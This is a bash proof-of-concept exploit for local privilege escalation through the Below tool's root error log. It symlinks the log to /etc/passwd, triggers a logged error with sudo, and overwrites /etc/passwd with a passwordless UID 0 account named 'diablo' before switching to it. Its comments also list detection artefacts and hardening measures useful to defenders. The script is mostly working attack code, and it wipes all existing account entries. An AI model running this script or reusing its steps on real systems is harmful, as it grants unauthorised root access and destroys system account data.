#!/bin/bash
# Proof of concept: local privilege escalation through Below's root error log
# (/var/log/below/error_root.log). The script ends by installing a UID 0
# account named 'diablo' with an empty password field and switching to it.
#
# What the steps rely on (inferred from the commands below; confirm against
# the installed build):
#   - the invoking user can delete and create entries in /var/log/below
#   - the invoking user is allowed to run /usr/bin/below through sudo
#   - after that sudo run, the file the log path resolves to is writable by
#     the invoking user; presumably the root process opens the log through
#     the symlink and relaxes its mode. Without that the later cp fails.
#
# Side effect: the copy through the symlink replaces the entire contents of
# /etc/passwd with a single line, so every existing account entry is lost.
#
# Status lines are printed unconditionally; a "[+]" line does not prove that
# the preceding command succeeded.
#
# Host artefacts useful for detection and triage:
#   - /var/log/below/error_root.log being a symlink (here -> /etc/passwd)
#   - a mode or content change on /etc/passwd by a non-root user
#   - a passwd entry with UID 0 and an empty password field
#   - /tmp/fake_diablo_passwd (removed again near the end of the run)
#   - a sudo log entry for "below snapshot --begin veryfake"
#
# Hardening that breaks the chain: a log directory writable only by root, a
# logger that refuses to follow symlinks and does not loosen file modes, and
# no blanket sudo rule for /usr/bin/below.

# Print one status line to stdout.
say() {
  printf '%s\n' "$1"
}

# Fixed, predictable staging path for the replacement passwd line.
readonly TMP_FILE="/tmp/fake_diablo_passwd"

say "[*] Creating fake root user entry for 'diablo'..."
# passwd fields: name, empty password, UID 0, GID 0, gecos, home, shell.
printf '%s\n' 'diablo::0:0:diablo:/root:/bin/bash' >"$TMP_FILE"
say "[+] Temporary passwd file created at $TMP_FILE"

say "[*] Removing original Below log file if it exists..."
# Only possible when the caller has write access to the log directory.
rm -f /var/log/below/error_root.log
say "[+] Removed old error_root.log"

say "[*] Creating symlink from /var/log/below/error_root.log -> /etc/passwd..."
# From here on, anything that opens the log path by name reaches /etc/passwd.
ln -s /etc/passwd /var/log/below/error_root.log
say "[+] Symlink created"

say "[*] Running Below to log error..."
# 'veryfake' is not a valid --begin value; it is passed to make the root
# process log an error. All output from the run is discarded.
sudo /usr/bin/below snapshot --begin veryfake >/dev/null 2>&1
say "[+] Below triggered (error logged as 'running below to log error')"

say "[*] Overwriting Below log with fake passwd entry..."
# cp follows the symlink and truncates the target: /etc/passwd now holds only
# the staged line.
cp "$TMP_FILE" /var/log/below/error_root.log
say "[+] Fake passwd entry applied"

say "[*] Cleaning up temporary file..."
rm -f "$TMP_FILE"
say "[+] Temporary file removed"

say "[*] Switching to new root user 'diablo'..."
# The empty password field is what lets su proceed without a credential.
su diablo